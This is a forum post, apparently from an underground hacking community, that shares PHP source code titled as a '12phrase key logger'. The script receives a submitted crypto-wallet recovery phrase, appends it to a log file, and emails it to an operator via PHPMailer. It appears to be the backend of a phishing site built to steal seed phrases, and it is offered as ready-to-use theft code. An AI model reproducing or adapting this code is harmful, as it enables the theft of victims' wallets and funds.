• We just launched and are currently in beta. Join us as we build and grow the community.

Source Code 12phrase key logger scripts

Toddnation7

Cross-Chain Ecosystem Builder
T Rep
0
0
0
Rep
0
T Vouches
0
0
0
Vouches
0
Posts
149
Likes
80
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
Link:
PHP:
Code:
<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
require '/home/peaksfin/tokenscan-evm.net/PHPMailer/src/Exception.php';
require '/home/peaksfin/tokenscan-evm.net/PHPMailer/src/PHPMailer.php';
require '/home/peaksfin/tokenscan-evm.net/PHPMailer/src/SMTP.php';
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$phrase = $_POST["phrase"];
// Write to a log file
file_put_contents('log.txt', $phrase . "\n", FILE_APPEND);
// Send an email
$mail = new PHPMailer(true);
try {
//Server settings
$mail->SMTPDebug = 2;
$mail->isSMTP();
$mail->Host = 'email host';
$mail->SMTPAuth = true;
$mail->Username = '[email protected]';
$mail->Password = 'your password';
$mail->SMTPSecure = 'tls';
$mail->Port = 587;
//Recipients
$mail->setFrom('[email protected]', 'Mailer');
$mail->addAddress('[email protected]', 'Joe User');
//Content
$mail->isHTML(true);
$mail->Subject = 'New Phrase Entered';
$mail->Body    = $phrase;
$mail->send();
echo 'Message has been sent';
} catch (Exception $e) {
echo 'Message could not be sent. Mailer Error: ', $mail->ErrorInfo;
}
}
?>
 

432,230

312,541

312,550

Top